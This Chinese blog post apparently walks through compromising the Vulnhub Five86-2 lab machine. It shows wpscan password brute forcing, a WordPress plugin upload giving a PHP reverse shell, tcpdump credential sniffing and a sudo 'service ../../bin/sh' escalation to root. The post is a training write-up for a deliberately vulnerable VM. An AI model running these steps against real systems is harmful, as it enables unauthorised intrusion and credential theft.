Vulnhub:Five86-2靶机

最新推荐文章于 2024-07-10 17:18:35 发布
最新推荐文章于 2024-07-10 17:18:35 发布
阅读量105 收藏
点赞数
文章标签: 安全 网络安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/129328403
版权

kali:192.168.111.111

靶机:192.168.111.211

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.211

wpscan收集目标wordpress用户

wpscan --url http://five86-2/ -e u

wpscan爆破用户密码

wpscan --url http://five86-2/ -U user.txt -P /usr/share/wordlists/rockyou.txt

使用barney登录wordpress后台,发现插件Insert or Embed Articulate Content into WordPress Trial存在远程代码执行

searchsploit Insert or Embed Articulate

漏洞利用

创建一个zip压缩包里面包含一个html文件,和php反弹shell

上传后文件所在路径

之后访问php反弹shell

提权

使用之前wpscan爆破出的stephen用户的密码切换到stephen用户

使用linpease.sh收集信息,发现可以使用tcpdump

tcpdump抓取流量,获得paul用户密码:paul|esomepasswford

timeout 100 tcpdump -i br-eca3858d86bf

切换到paul用户查看sudo权限

提权方法:https://gtfobins.github.io/gtfobins/service/#sudo

sudo -u peter service ../../bin/sh

peter用户sudo权限

用命令passwd修改root用户密码

sudo -u root /usr/bin/passwd

切换到root用户

su root

获得flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机Five86-2渗透笔记
liver100day的博客
09-11 519
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 查找有关WordPress 5.1.4版本的漏洞3.2 WPscan 破解账户密码3.3 反弹shell第一步:生成一句话木马文件第二步:压缩一句话木马文件第三步:上传压缩文件并获取shell4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机Five86-2 IP地址未知 靶机下载地址:http://www.
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
渗透测试学习之靶机Five86-2
情感博主V
03-22 616
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.148 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.148 web站点相关服务信息 css加载不出来,奇怪… 目录信息 使用dirb,看一下有无敏感文件: dirb http://192.168.246.148 试图访问ht...
Five86-2靶机渗透实战-vuluhub系列(七)
PANDA墨森的博客
07-07 405
这是vulnhub靶机系列文章的第七篇,本次主要知识点为:wordpress后台插件getshell,tcpdump抓取ftp流量,sudo滥用之service、passwd提权,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/five86-2,418/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13202380.html #001 环境搭建(nat) 攻击机kali:192.168.136.1..
Five86-2靶机渗透记录
Jach1n
01-31 213
Five86-2靶机渗透记录
Vulnhub靶机Five86-2详细解析
蚁景网安学院
01-21 595
喜欢就关注我吧,订阅更多最新消息VulnHub渗透测试实战靶场Jarbas 1.0https://www.hetianlab.com/expc.do?ec=ECIDfe8c-5c48-4...
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnhubFive86-2
4ut15m's blog
02-12 800
Description Five86-2 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to re...
five86-2靶机渗透攻略
weixin_47311099的博客
01-11 733
下载地址:https://www.five86.com/five86-2.html 需要修改hosts文件 添加five86-2的解析 ​ 信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 ​ 192.168.93.132开放21ftp 80http ​ 网站信息收集 访问80端口 ​ 发现cms为wordpress5.1.4,未发现有效利用漏洞 使用wpscan进行扫描 wpscan --url [http://five86-2](http://five86-2)
记一次vulnhub|渗透测试Five86-2
crispr的博客
01-29 1377
Five86-2 0X01 Main Point 1.wpscan的使用 2.tcpdump的抓包以及流量分析 3.wordpress插件提权 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开放情况: ftp无法匿名登录,只能从80端口入手: wordpress框架;显示不清楚; 在/et...
Five86-2靶机
Yuer422的博客
02-28 1877
所有网络上的数据包,甚至是那些发送给其他主机的,通过这种机制,都是可以捕获的。表示执行用户模块,这将允许WPScan尝试收集有关目标WordPress网站的用户信息,包括用户名称、角色和其他相关信息。结果与sn参数相同,但是sP参数只进行ping扫描,而sn会发送四种不同类型的数据包来探测目标主机是否在线,只要收到其中一个包的回复,那就证明目标机开启。的含义是启用用户(User)模块,用于扫描和收集有关WordPress网站用户的信息。WPScan 可以检测WordPress核心、主题和插件的已知漏洞。
笔记20-40
2201_75378806的博客
03-27 572
常规烧苗只有80端口,是个登入页面,是CuteNews 2.0.3 ,searchsploit CuteNews 2.0.3(或者谷歌搜索可利用漏洞),直接注册账号后在上传头像处上传一个带shell的.jpg文件,抓包改.php(我看人家直接上传php也可以)监听得权限,一番提权搜索,啥也没有,利用内核提权。(上传linpeas.sh搜索是脏牛,根据searchsploit kernel 3.16.0-30的不行)
记一次vulnhub|渗透测试Five86-1
crispr的博客
01-26 646
vulnhub Literally-Vulnerable 0X01 Main Point 1.sploitdb的使用 2.crunch字典生成和john爆破的混搭 3.利用kali进行SSH和靶机连接 4.sudo -l查看用户被授予其它权限的文件 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 605
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
最新发布
TSINGSEE青犀视频官方技术博客
07-10 442
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1288
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值